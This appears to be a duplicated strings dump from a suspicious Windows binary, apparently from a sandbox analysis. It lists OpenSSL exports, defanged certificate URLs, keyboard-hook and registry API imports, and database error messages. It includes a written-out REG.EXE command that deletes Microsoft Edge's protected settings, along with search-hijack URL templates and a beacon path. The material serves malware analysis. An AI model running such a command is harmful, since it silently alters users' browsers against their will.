TS_CONF_load_cert
TS_CONF_load_certs
TS_CONF_load_certs
TS_CONF_load_key
TS_CONF_load_key
TS_CONF_set_certs
TS_CONF_set_certs
TS_CONF_set_ess_cert_id_chain
TS_CONF_set_ess_cert_id_chain
TS_CONF_set_signer_cert
TS_CONF_set_signer_cert
TS_CONF_set_signer_key
TS_CONF_set_signer_key
TS_MSG_IMPRINT_dup
TS_MSG_IMPRINT_dup
TS_MSG_IMPRINT_free
TS_MSG_IMPRINT_free
TS_MSG_IMPRINT_get_algo
TS_MSG_IMPRINT_get_algo
TS_MSG_IMPRINT_get_msg
TS_MSG_IMPRINT_get_msg
TS_MSG_IMPRINT_new
TS_MSG_IMPRINT_new
TS_MSG_IMPRINT_print_bio
TS_MSG_IMPRINT_print_bio
TS_MSG_IMPRINT_set_algo
TS_MSG_IMPRINT_set_algo
TS_MSG_IMPRINT_set_msg
TS_MSG_IMPRINT_set_msg
TS_REQ_get_cert_req
TS_REQ_get_cert_req
TS_REQ_get_msg_imprint
TS_REQ_get_msg_imprint
TS_REQ_set_cert_req
TS_REQ_set_cert_req
TS_REQ_set_msg_imprint
TS_REQ_set_msg_imprint
TS_RESP_CTX_set_certs
TS_RESP_CTX_set_certs
TS_RESP_CTX_set_signer_cert
TS_RESP_CTX_set_signer_cert
TS_RESP_CTX_set_signer_key
TS_RESP_CTX_set_signer_key
TS_TST_INFO_get_msg_imprint
TS_TST_INFO_get_msg_imprint
TS_TST_INFO_set_msg_imprint
TS_TST_INFO_set_msg_imprint
X509_CERT_AUX_free
X509_CERT_AUX_free
X509_CERT_AUX_it
X509_CERT_AUX_it
X509_CERT_AUX_new
X509_CERT_AUX_new
X509_CERT_AUX_print
X509_CERT_AUX_print
X509_CERT_PAIR_free
X509_CERT_PAIR_free
X509_CERT_PAIR_it
X509_CERT_PAIR_it
X509_CERT_PAIR_new
X509_CERT_PAIR_new
X509_CRL_get0_by_cert
X509_CRL_get0_by_cert
X509_PKEY_free
X509_PKEY_free
X509_PKEY_new
X509_PKEY_new
X509_PUBKEY_free
X509_PUBKEY_free
X509_PUBKEY_get0_param
X509_PUBKEY_get0_param
X509_PUBKEY_it
X509_PUBKEY_it
X509_PUBKEY_new
X509_PUBKEY_new
X509_PUBKEY_set
X509_PUBKEY_set
X509_PUBKEY_set0_param
X509_PUBKEY_set0_param
X509_REQ_check_private_key
X509_REQ_check_private_key
X509_REQ_get_pubkey
X509_REQ_get_pubkey
X509_STORE_CTX_set_cert
X509_STORE_CTX_set_cert
X509_STORE_get1_certs
X509_STORE_get1_certs
X509_certificate_type
X509_certificate_type
X509_check_private_key
X509_check_private_key
X509_get0_pubkey_bitstr
X509_get0_pubkey_bitstr
X509_get_default_cert_area
X509_get_default_cert_area
X509_get_default_cert_dir
X509_get_default_cert_dir
X509_get_default_cert_dir_env
X509_get_default_cert_dir_env
X509_get_pubkey
X509_get_pubkey
X509_get_pubkey_parameters
X509_get_pubkey_parameters
X509_keyid_get0
X509_keyid_get0
X509_keyid_set1
X509_keyid_set1
X509_load_cert_crl_file
X509_load_cert_crl_file
X509_load_cert_file
X509_load_cert_file
X509_pubkey_digest
X509_pubkey_digest
X509_supported_extension
X509_supported_extension
X509_verify_cert
X509_verify_cert
X509_verify_cert_error_string
X509_verify_cert_error_string
_ossl_old_des_is_weak_key
_ossl_old_des_is_weak_key
_ossl_old_des_key_sched
_ossl_old_des_key_sched
_ossl_old_des_random_key
_ossl_old_des_random_key
_ossl_old_des_read_2passwords
_ossl_old_des_read_2passwords
_ossl_old_des_read_password
_ossl_old_des_read_password
_ossl_old_des_string_to_2keys
_ossl_old_des_string_to_2keys
_ossl_old_des_string_to_key
_ossl_old_des_string_to_key
_shadow_DES_check_key
_shadow_DES_check_key
aesni_set_decrypt_key
aesni_set_decrypt_key
aesni_set_encrypt_key
aesni_set_encrypt_key
b2i_PrivateKey
b2i_PrivateKey
b2i_PrivateKey_bio
b2i_PrivateKey_bio
b2i_PublicKey
b2i_PublicKey
b2i_PublicKey_bio
b2i_PublicKey_bio
d2i_AUTHORITY_KEYID
d2i_AUTHORITY_KEYID
d2i_CERTIFICATEPOLICIES
d2i_CERTIFICATEPOLICIES
d2i_DSAPrivateKey_bio
d2i_DSAPrivateKey_bio
d2i_DSAPrivateKey_fp
d2i_DSAPrivateKey_fp
d2i_DSAPublicKey
d2i_DSAPublicKey
d2i_DSA_PUBKEY
d2i_DSA_PUBKEY
d2i_DSA_PUBKEY_bio
d2i_DSA_PUBKEY_bio
d2i_DSA_PUBKEY_fp
d2i_DSA_PUBKEY_fp
d2i_ECPrivateKey
d2i_ECPrivateKey
d2i_ECPrivateKey_bio
d2i_ECPrivateKey_bio
d2i_ECPrivateKey_fp
d2i_ECPrivateKey_fp
d2i_EC_PUBKEY
d2i_EC_PUBKEY
d2i_EC_PUBKEY_bio
d2i_EC_PUBKEY_bio
d2i_EC_PUBKEY_fp
d2i_EC_PUBKEY_fp
d2i_ESS_CERT_ID
d2i_ESS_CERT_ID
d2i_ESS_SIGNING_CERT
d2i_ESS_SIGNING_CERT
d2i_EXTENDED_KEY_USAGE
d2i_EXTENDED_KEY_USAGE
d2i_KRB5_ENCKEY
d2i_KRB5_ENCKEY
d2i_NETSCAPE_CERT_SEQUENCE
d2i_NETSCAPE_CERT_SEQUENCE
d2i_OCSP_CERTID
d2i_OCSP_CERTID
d2i_OCSP_CERTSTATUS
d2i_OCSP_CERTSTATUS
d2i_PKCS8PrivateKey_bio
d2i_PKCS8PrivateKey_bio
d2i_PKCS8PrivateKey_fp
d2i_PKCS8PrivateKey_fp
d2i_PKCS8_PRIV_KEY_INFO
d2i_PKCS8_PRIV_KEY_INFO
d2i_PKCS8_PRIV_KEY_INFO_bio
d2i_PKCS8_PRIV_KEY_INFO_bio
d2i_PKCS8_PRIV_KEY_INFO_fp
d2i_PKCS8_PRIV_KEY_INFO_fp
d2i_PKEY_USAGE_PERIOD
d2i_PKEY_USAGE_PERIOD
d2i_PROXY_CERT_INFO_EXTENSION
d2i_PROXY_CERT_INFO_EXTENSION
d2i_PUBKEY
d2i_PUBKEY
d2i_PUBKEY_bio
d2i_PUBKEY_bio
d2i_PUBKEY_fp
d2i_PUBKEY_fp
d2i_PrivateKey_fp
d2i_PrivateKey_fp
d2i_RSAPrivateKey_bio
d2i_RSAPrivateKey_bio
d2i_RSAPrivateKey_fp
d2i_RSAPrivateKey_fp
d2i_RSAPublicKey_bio
d2i_RSAPublicKey_bio
d2i_RSAPublicKey_fp
d2i_RSAPublicKey_fp
d2i_RSA_PUBKEY
d2i_RSA_PUBKEY
d2i_RSA_PUBKEY_bio
d2i_RSA_PUBKEY_bio
d2i_RSA_PUBKEY_fp
d2i_RSA_PUBKEY_fp
d2i_TS_MSG_IMPRINT
d2i_TS_MSG_IMPRINT
d2i_TS_MSG_IMPRINT_bio
d2i_TS_MSG_IMPRINT_bio
d2i_TS_MSG_IMPRINT_fp
d2i_TS_MSG_IMPRINT_fp
d2i_X509_CERT_AUX
d2i_X509_CERT_AUX
d2i_X509_CERT_PAIR
d2i_X509_CERT_PAIR
d2i_X509_PKEY
d2i_X509_PKEY
d2i_X509_PUBKEY
d2i_X509_PUBKEY
i2b_PrivateKey_bio
i2b_PrivateKey_bio
i2b_PublicKey_bio
i2b_PublicKey_bio
i2d_AUTHORITY_KEYID
i2d_AUTHORITY_KEYID
i2d_CERTIFICATEPOLICIES
i2d_CERTIFICATEPOLICIES
i2d_DSAPrivateKey_bio
i2d_DSAPrivateKey_bio
i2d_DSAPrivateKey_fp
i2d_DSAPrivateKey_fp
i2d_DSAPublicKey
i2d_DSAPublicKey
i2d_DSA_PUBKEY
i2d_DSA_PUBKEY
i2d_DSA_PUBKEY_bio
i2d_DSA_PUBKEY_bio
i2d_DSA_PUBKEY_fp
i2d_DSA_PUBKEY_fp
i2d_ECPrivateKey
i2d_ECPrivateKey
i2d_ECPrivateKey_bio
i2d_ECPrivateKey_bio
i2d_ECPrivateKey_fp
i2d_ECPrivateKey_fp
i2d_EC_PUBKEY
i2d_EC_PUBKEY
i2d_EC_PUBKEY_bio
i2d_EC_PUBKEY_bio
i2d_EC_PUBKEY_fp
i2d_EC_PUBKEY_fp
i2d_ESS_CERT_ID
i2d_ESS_CERT_ID
i2d_ESS_SIGNING_CERT
i2d_ESS_SIGNING_CERT
i2d_EXTENDED_KEY_USAGE
i2d_EXTENDED_KEY_USAGE
i2d_KRB5_ENCKEY
i2d_KRB5_ENCKEY
i2d_OCSP_CERTID
i2d_OCSP_CERTID
i2d_OCSP_CERTSTATUS
i2d_OCSP_CERTSTATUS
i2d_PKCS8PrivateKeyInfo_bio
i2d_PKCS8PrivateKeyInfo_bio
i2d_PKCS8PrivateKeyInfo_fp
i2d_PKCS8PrivateKeyInfo_fp
i2d_PKCS8PrivateKey_bio
i2d_PKCS8PrivateKey_bio
i2d_PKCS8PrivateKey_fp
i2d_PKCS8PrivateKey_fp
i2d_PKCS8PrivateKey_nid_bio
i2d_PKCS8PrivateKey_nid_bio
i2d_PKCS8PrivateKey_nid_fp
i2d_PKCS8PrivateKey_nid_fp
i2d_PKCS8_PRIV_KEY_INFO
i2d_PKCS8_PRIV_KEY_INFO
i2d_PKCS8_PRIV_KEY_INFO_bio
i2d_PKCS8_PRIV_KEY_INFO_bio
i2d_PKCS8_PRIV_KEY_INFO_fp
i2d_PKCS8_PRIV_KEY_INFO_fp
i2d_PKEY_USAGE_PERIOD
i2d_PKEY_USAGE_PERIOD
i2d_PROXY_CERT_INFO_EXTENSION
i2d_PROXY_CERT_INFO_EXTENSION
i2d_PUBKEY
i2d_PUBKEY
i2d_PUBKEY_bio
i2d_PUBKEY_bio
i2d_PUBKEY_fp
i2d_PUBKEY_fp
i2d_PrivateKey_fp
i2d_PrivateKey_fp
i2d_RSAPrivateKey_bio
i2d_RSAPrivateKey_bio
i2d_RSAPrivateKey_fp
i2d_RSAPrivateKey_fp
i2d_RSAPublicKey_bio
i2d_RSAPublicKey_bio
i2d_RSAPublicKey_fp
i2d_RSAPublicKey_fp
i2d_RSA_PUBKEY
i2d_RSA_PUBKEY
i2d_RSA_PUBKEY_bio
i2d_RSA_PUBKEY_bio
i2d_RSA_PUBKEY_fp
i2d_RSA_PUBKEY_fp
i2d_TS_MSG_IMPRINT
i2d_TS_MSG_IMPRINT
i2d_TS_MSG_IMPRINT_bio
i2d_TS_MSG_IMPRINT_bio
i2d_TS_MSG_IMPRINT_fp
i2d_TS_MSG_IMPRINT_fp
i2d_X509_CERT_AUX
i2d_X509_CERT_AUX
i2d_X509_CERT_PAIR
i2d_X509_CERT_PAIR
i2d_X509_PKEY
i2d_X509_PKEY
i2d_X509_PUBKEY
i2d_X509_PUBKEY
i2o_ECPublicKey
i2o_ECPublicKey
o2i_ECPublicKey
o2i_ECPublicKey
private_AES_set_decrypt_key
private_AES_set_decrypt_key
private_AES_set_encrypt_key
private_AES_set_encrypt_key
private_RC4_set_key
private_RC4_set_key
Thawte Certification1
Thawte Certification1
hXXp://ocsp.thawte.com0
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
hXXps://VVV.verisign.com/cps0*
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
hXXp://ocsp.verisign.com0
hXXp://VVV.vmware.com/0
hXXp://VVV.vmware.com/0
O"%U.
O"%U.
"`#.hr
"`#.hr
MP0.jc
MP0.jc
%DP`H
%DP`H
v%%DH
v%%DH
~.xp`I
~.xp`I
.VQWd
.VQWd
\.WWWW9
\.WWWW9
tCPTFlRPu
tCPTFlRPu
?%D|W
?%D|W
\.DHLP.
\.DHLP.
\.hlpt.
\.hlpt.
is %d?)`
is %d?)`
'%s:%d: reX
'%s:%d: reX
ng)msg_hdr|
ng)msg_hdr|
.too smh7
.too smh7
?gKey-Arg
?gKey-Arg
_KEY_BLOC
_KEY_BLOC
.UDICQ
.UDICQ
@.MNl1
@.MNl1
SSLEAY32.dll
SSLEAY32.dll
SSL_CTX_get_cert_store
SSL_CTX_get_cert_store
SSL_CTX_get_client_cert_cb
SSL_CTX_get_client_cert_cb
SSL_CTX_set_cert_store
SSL_CTX_set_cert_store
SSL_CTX_set_cert_verify_callback
SSL_CTX_set_cert_verify_callback
SSL_CTX_set_client_cert_cb
SSL_CTX_set_client_cert_cb
SSL_CTX_set_client_cert_engine
SSL_CTX_set_client_cert_engine
SSL_CTX_set_msg_callback
SSL_CTX_set_msg_callback
SSL_CTX_set_srp_password
SSL_CTX_set_srp_password
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey
SSL_CTX_use_RSAPrivateKey
SSL_CTX_use_RSAPrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate_ASN1
SSL_add_dir_cert_subjects_to_stack
SSL_add_dir_cert_subjects_to_stack
SSL_add_file_cert_subjects_to_stack
SSL_add_file_cert_subjects_to_stack
SSL_check_private_key
SSL_check_private_key
SSL_export_keying_material
SSL_export_keying_material
SSL_get_certificate
SSL_get_certificate
SSL_get_peer_cert_chain
SSL_get_peer_cert_chain
SSL_get_privatekey
SSL_get_privatekey
SSL_set_msg_callback
SSL_set_msg_callback
SSL_use_PrivateKey
SSL_use_PrivateKey
SSL_use_PrivateKey_ASN1
SSL_use_PrivateKey_ASN1
SSL_use_PrivateKey_file
SSL_use_PrivateKey_file
SSL_use_RSAPrivateKey
SSL_use_RSAPrivateKey
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey_file
SSL_use_RSAPrivateKey_file
SSL_use_certificate
SSL_use_certificate
SSL_use_certificate_ASN1
SSL_use_certificate_ASN1
SSL_use_certificate_file
SSL_use_certificate_file
WinExec
WinExec
SetProcessShutdownParameters
SetProcessShutdownParameters
SetNamedPipeHandleState
SetNamedPipeHandleState
GetWindowsDirectoryA
GetWindowsDirectoryA
GetCPInfo
GetCPInfo
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegSaveKeyA
RegSaveKeyA
RegRestoreKeyA
RegRestoreKeyA
RegQueryInfoKeyW
RegQueryInfoKeyW
RegQueryInfoKeyA
RegQueryInfoKeyA
RegOpenKeyExW
RegOpenKeyExW
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCreateKeyExA
SetViewportOrgEx
SetViewportOrgEx
ShellExecuteW
ShellExecuteW
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyA
MapVirtualKeyA
LoadKeyboardLayoutA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextA
GetKeyNameTextA
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
EnumChildWindows
EnumChildWindows
CreateDialogIndirectParamW
CreateDialogIndirectParamW
CreateDialogIndirectParamA
CreateDialogIndirectParamA
ActivateKeyboardLayout
ActivateKeyboardLayout
GetKeyboardType
GetKeyboardType
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
*#%"{}|\^[]`
*#%"{}|\^[]`
hXXps://
hXXps://
/ot.php?imsid=
/ot.php?imsid=
sDELETE "HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy" /f
sDELETE "HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy" /f
REG.EXE
REG.EXE
hXXp://VVV.w3.org/2001/XMLSchema
hXXp://VVV.w3.org/2001/XMLSchema
hXXp://VVV.w3.org/2000/xmlns/
hXXp://VVV.w3.org/2000/xmlns/
hXXp://VVV.w3.org/2001/XMLSchema-instance
hXXp://VVV.w3.org/2001/XMLSchema-instance
{searchTerms}&text2=%s&suggest=1&type=6
{searchTerms}&text2=%s&suggest=1&type=6
{searchTerms}&text2=%s&instant=1&type=6
{searchTerms}&text2=%s&instant=1&type=6
{searchTerms}&text2=%s&search=1&type=6
{searchTerms}&text2=%s&search=1&type=6
hXXp://google.com
hXXp://google.com
888816666554443
888816666554443
6666554443
6666554443
!6666554443
!6666554443
No matching DOM Vendor: "%s"
No matching DOM Vendor: "%s"
Node "%s" not found
Node "%s" not found
IDOMNode required.Attributes are not supported on this node type
IDOMNode required.Attributes are not supported on this node type
Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions
Invalid node type Mismatched paramaters to RegisterChildNodes Element does not contain a single text node4DOM Implementation does not support IDOMParseOptions
Node is readonlyCRefresh is only supported if the FileName or XML properties are set
Node is readonlyCRefresh is only supported if the FileName or XML properties are set
HSQLite library initialization failed. Main code [%d], extended code [%d]/Database specified by [%p] handle was not foundHVTab: Invalid number of arguments at VTabCreate. Expected [%d], got [%d](VTab: Dataset [%s] is not found or empty VTab: Operation is not supported!VTab: Savepoint [%d] is not found!VTab: Dataset modification failed/VTab: Explicit ROWID at INSERT is not supported9VTab: Dataset state was changed. Cannot perform operation"VTab: Specified row does not exist
HSQLite library initialization failed. Main code [%d], extended code [%d]/Database specified by [%p] handle was not foundHVTab: Invalid number of arguments at VTabCreate. Expected [%d], got [%d](VTab: Dataset [%s] is not found or empty VTab: Operation is not supported!VTab: Savepoint [%d] is not found!VTab: Dataset modification failed/VTab: Explicit ROWID at INSERT is not supported9VTab: Dataset state was changed. Cannot perform operation"VTab: Specified row does not exist
VTab: Invalid cursor;TADLocalSQL must be attached to an active SQLite connection0VTab: DataSet [%s] is busy by another result set/Cannot perform action. DBTOOLn.DLL is not found
VTab: Invalid cursor;TADLocalSQL must be attached to an active SQLite connection0VTab: DataSet [%s] is busy by another result set/Cannot perform action. DBTOOLn.DLL is not found
Unnamed)"%s" DOMImplementation already registered
Unnamed)"%s" DOMImplementation already registered
5Maximum length (%d) of GTRID exceeded - %d (NOE18/TX)5Maximum length (%d) of BQUAL exceeded - %d (NOE19/TX)@Maximum length (%d) of transaction name exceeded - %d (NOE20/TX)@Too many close braces in names file after alias [%s] (NOE105/DB)0[%s] is not a callable PL/SQL object (NOE130/SP)2[%s, #%d] is not found in [%s] package (NOE134/SP)TParameter with type TABLE OF BOOLEAN/RECORD not supported (use TADQuery) (NOE135/SP)KParameter with type RECORD must be of named type (use TADQuery) (NOE142/SP))Cannot convert Oracle Number [%s] to TBcd7DBMS_PIPE event alerter supports only single event name9Cannot start a trace session, when there is an active one"Stored procedure [%s] is not founduArray-typed variable [%s] dimensions [%d] are not supported.
5Maximum length (%d) of GTRID exceeded - %d (NOE18/TX)5Maximum length (%d) of BQUAL exceeded - %d (NOE19/TX)@Maximum length (%d) of transaction name exceeded - %d (NOE20/TX)@Too many close braces in names file after alias [%s] (NOE105/DB)0[%s] is not a callable PL/SQL object (NOE130/SP)2[%s, #%d] is not found in [%s] package (NOE134/SP)TParameter with type TABLE OF BOOLEAN/RECORD not supported (use TADQuery) (NOE135/SP)KParameter with type RECORD must be of named type (use TADQuery) (NOE142/SP))Cannot convert Oracle Number [%s] to TBcd7DBMS_PIPE event alerter supports only single event name9Cannot start a trace session, when there is an active one"Stored procedure [%s] is not founduArray-typed variable [%s] dimensions [%d] are not supported.
Only sigle dimensional simple type arrays are supportedqArray-typed variable [%s] unsupported element type [%d].
Only sigle dimensional simple type arrays are supportedqArray-typed variable [%s] unsupported element type [%d].
Only sigle dimensional simple type arrays are supportedCArray-typed variable [%s] item index [%d] is out of bounds [%d, %d]
Only sigle dimensional simple type arrays are supportedCArray-typed variable [%s] item index [%d] is out of bounds [%d, %d]
Cannot describe type [%d].
Cannot describe type [%d].
Possible reason: uADCompScriptCommands unit is not linked to the application`No script to execute for [%s].
Possible reason: uADCompScriptCommands unit is not linked to the application`No script to execute for [%s].
Possible reason: SQLScriptFileName and SQLScripts both are empty Connection parameter [%s] must be not empty|DbExpress driver configuration file [%s] is not found.
Possible reason: SQLScriptFileName and SQLScripts both are empty Connection parameter [%s] must be not empty|DbExpress driver configuration file [%s] is not found.
Possible reason: dbExpress is not properly installed on this machineUUnsupported MySQL version [%d].
Possible reason: dbExpress is not properly installed on this machineUUnsupported MySQL version [%d].
Supported are client and server from v 3.20 to v 6.2
Supported are client and server from v 3.20 to v 6.2
Port number cannot be changed&Error in parameter [%s] definition. %sFFailed to initialize embedded server.
Port number cannot be changed&Error in parameter [%s] definition. %sFFailed to initialize embedded server.
See MySQL log files for details/Variable [%s] C data type [%d] is not supported
See MySQL log files for details/Variable [%s] C data type [%d] is not supported
No cursors availableCCannot initialize OCI with character set [%s].
No cursors availableCCannot initialize OCI with character set [%s].
Possible reason: %s1Cannot assign value to BFILE/CFILE parameter [%s]HNo cursor parameters are defined. Include fiMeta into FetchOptions.Items9OCI is not properly installed on this machine (NOE1/INIT)ZUnsupported OCI library [%s] version [%s].
Possible reason: %s1Cannot assign value to BFILE/CFILE parameter [%s]HNo cursor parameters are defined. Include fiMeta into FetchOptions.Items9OCI is not properly installed on this machine (NOE1/INIT)ZUnsupported OCI library [%s] version [%s].
At least version 8.0.3 is required (NOE2/INIT)0Bad or undefined variable param type (NOE12/VAR)
At least version 8.0.3 is required (NOE2/INIT)0Bad or undefined variable param type (NOE12/VAR)
#Cannot read RAW data of [%s] object
#Cannot read RAW data of [%s] object
Class [%s] is not registered
Class [%s] is not registered
Unknown storage format [%s]"Cannot move file [%s] to [%s].
Unknown storage format [%s]"Cannot move file [%s] to [%s].
%s!Invalid date interval format [%s]Ênnot execute host command [%s].
%s!Invalid date interval format [%s]Ênnot execute host command [%s].
%s)String size must be of 1 character length.Character cannot be alphanumeric or whitespace
%s)String size must be of 1 character length.Character cannot be alphanumeric or whitespace
Invalid command [%s] syntax-ACCEPT statement must specify a variable name,DEFINE requires a value following equal sign
Invalid command [%s] syntax-ACCEPT statement must specify a variable name,DEFINE requires a value following equal sign
VARIABLE has missed right brace"VARIABLE has unsupported data typeÊnnot execute command. Not logged on
VARIABLE has missed right brace"VARIABLE has unsupported data typeÊnnot execute command. Not logged on
=Text field [%s] size is undefined in Fixed Size Record format"Text field [%s] name is Duplicated5Bad text value [%s] format for mapping item [%s].
=Text field [%s] size is undefined in Fixed Size Record format"Text field [%s] name is Duplicated5Bad text value [%s] format for mapping item [%s].
%s?Undefined source field or expression for destination field [%s]
%s?Undefined source field or expression for destination field [%s]
Timeout expired"Cannot get access to BLOB raw datahVariable length data parameter [%s] overflow.
Timeout expired"Cannot get access to BLOB raw datahVariable length data parameter [%s] overflow.
Value length - [%d], parameter data maximum length - [%d]PCannot perform nonblocking action, while other nonblocking action is in progress
Value length - [%d], parameter data maximum length - [%d]PCannot perform nonblocking action, while other nonblocking action is in progress
Macro [%s] is not found7Parameter [%s] value index [%d] is out of range [0..%d]mCannot acquire item (connection) from pool.
Macro [%s] is not found7Parameter [%s] value index [%d] is out of range [0..%d]mCannot acquire item (connection) from pool.
Maximal number [%d] of simultaneous items (connections) reached.@.
Maximal number [%d] of simultaneous items (connections) reached.@.
To register it, you can drop component [%s] into your project>.
To register it, you can drop component [%s] into your project>.
To register it, you can include unit [%s] into your project
To register it, you can include unit [%s] into your project
Cannot read [%s] property
Cannot read [%s] property
Cannot read [%s] object
Cannot read [%s] object
&Command [%s] must be in inactive state*Dataset [%s] must be in cached update moderConnection is not defined for [%s].
&Command [%s] must be in inactive state*Dataset [%s] must be in cached update moderConnection is not defined for [%s].
Connection [%s] must be online
Connection [%s] must be online
Table adapter [%s] cannot be assigned to [%s], because it is
Table adapter [%s] cannot be assigned to [%s], because it is
already assigned to [%s] and cannot be shared across few datasets6Dataset connection does not match to called connection Table [%s] must have primary keyWLocal SQL engine misusage by [%s].
already assigned to [%s] and cannot be shared across few datasets6Dataset connection does not match to called connection Table [%s] must have primary keyWLocal SQL engine misusage by [%s].
Hint: activate connection before activating dataset=Table [%s] index [%s] must be existing non-expressional index
Hint: activate connection before activating dataset=Table [%s] index [%s] must be existing non-expressional index
Dataset name must be not empty?Dataset name [%s] must be unique across Local SQL [%s] datasets
Dataset name must be not empty?Dataset name [%s] must be unique across Local SQL [%s] datasets
Text field [%s] is not found
Text field [%s] is not found
record has been changed/deleted by another user
record has been changed/deleted by another user
ADManager must be active#Connection name [%s] must be unique Connection [%s] must be inactive
ADManager must be active#Connection name [%s] must be unique Connection [%s] must be inactive
Connection [%s] must be active)Connection [%s] establishment is canceled
Connection [%s] must be active)Connection [%s] establishment is canceled
Connection [%s] cannot be pooled.
Connection [%s] cannot be pooled.
Possible reason: connection definition is not in the ADManager.ConnectionDefs list or
Possible reason: connection definition is not in the ADManager.ConnectionDefs list or
TADConnection.Params has additional parameters
TADConnection.Params has additional parameters
Connection [%s] is not found
Connection [%s] is not found
Possible reason: [%s] ConnectionName property is misspelled or references to nonexistent connection$Command [%s] must be in active state
Possible reason: [%s] ConnectionName property is misspelled or references to nonexistent connection$Command [%s] must be in active state
&Column [%s] data type is not supported
&Column [%s] data type is not supported
Param [%s] type changed from [ft%s] to [ft%s]. Query must be reprepared.
Param [%s] type changed from [ft%s] to [ft%s]. Query must be reprepared.
Possible reason: an assignment to a TADParam.AsXXX property implicitly changed the parameter data type.
Possible reason: an assignment to a TADParam.AsXXX property implicitly changed the parameter data type.
Hint: use the TADParam.Value or appropriate TADParam.AsXXX property1A meta data argument [%s] value must be specified
Hint: use the TADParam.Value or appropriate TADParam.AsXXX property1A meta data argument [%s] value must be specified
Expected number of parameters is [%d], but actual number is [%d].
Expected number of parameters is [%d], but actual number is [%d].
Possible reason: a parameter was added or deletedsData too large for variable [%s]. Max len = [%d], actual len = [%d]
Possible reason: a parameter was added or deletedsData too large for variable [%s]. Max len = [%d], actual len = [%d]
Hint: set the TADParam.Size to a greater value
Hint: set the TADParam.Size to a greater value
Database [%s] does not exist
Database [%s] does not exist
Access 2003 or earlier: hXXp://support.microsoft.com/kb/239114
Access 2003 or earlier: hXXp://support.microsoft.com/kb/239114
Access 2007: hXXp://VVV.microsoft.com/download/en/details.aspx?displaylang=en&id=23734
Access 2007: hXXp://VVV.microsoft.com/download/en/details.aspx?displaylang=en&id=23734
Access 2010: hXXp://VVV.microsoft.com/download/en/details.aspx?id=13255{JRO.JetEngine class is missing on client machine.
Access 2010: hXXp://VVV.microsoft.com/download/en/details.aspx?id=13255{JRO.JetEngine class is missing on client machine.
Hint: install latest engine from: hXXp://support.microsoft.com/kb/239114aDatabase format is not recognized.
Hint: install latest engine from: hXXp://support.microsoft.com/kb/239114aDatabase format is not recognized.
Possible reason: DBVersion value mismatches database version.&Specified database password is invalid
Possible reason: DBVersion value mismatches database version.&Specified database password is invalid
Unknown OLE error1To perform operation DriverLink must be specified To perform operation service must be activeGCannot deinstall a SQLite collation, while there are active connections?%s command %s [%d] instead of [1] record.
Unknown OLE error1To perform operation DriverLink must be specified To perform operation service must be activeGCannot deinstall a SQLite collation, while there are active connections?%s command %s [%d] instead of [1] record.
Possible reasons: %s
Possible reasons: %s
Connection must be inactive*Too many login retries. Allowed [%d] times1To perform operation driver manager, must be [%s]
Connection must be inactive*Too many login retries. Allowed [%d] times1To perform operation driver manager, must be [%s]
Character [%s] is missed
Character [%s] is missed
Too long identifier (> 255)6Parameter [%s] ArraySize [%d] is less than ATimes [%d]=Cannot perform action, because previous action is in progress%Escape function [%s] is not supported8Define(mmReset) is only supported for metainfo retrieval6Cannot generate update query. WHERE condition is empty4Cannot generate update query. Update table undefined
Too long identifier (> 255)6Parameter [%s] ArraySize [%d] is less than ATimes [%d]=Cannot perform action, because previous action is in progress%Escape function [%s] is not supported8Define(mmReset) is only supported for metainfo retrieval6Cannot generate update query. WHERE condition is empty4Cannot generate update query. Update table undefined
